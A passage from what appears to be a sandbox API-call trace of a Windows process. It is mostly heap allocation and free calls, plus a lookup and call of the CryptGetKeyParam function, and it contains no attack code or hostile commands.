Flags=0x0, Size=0x8) returned 0x43e28a0 [0093.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0093.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.013] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0093.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0093.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0093.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0093.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0093.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0093.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0093.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0093.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0093.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0093.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0093.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0093.014] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0093.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0093.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0093.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0093.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0093.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0093.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0093.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0093.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0093.014] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0093.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0093.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0093.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0093.015] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0093.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0093.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0093.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0093.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0093.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0093.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0093.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0093.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0093.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0093.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0093.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0093.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0093.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0093.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0093.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0093.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0093.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0093.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0093.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0093.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0093.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0093.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0093.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0093.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0093.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0093.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0093.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0093.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0093.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0093.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0093.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0093.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0093.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0093.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0093.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0093.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0093.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0093.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0093.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0093.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0093.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0093.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0093.019] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0093.019] CryptGetKeyParam (in: hKey=0x41ac740, dwParam=0x7, pbData=0x43e2850, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2850*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0093.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0093.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0093.021] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.022] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0093.022] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: 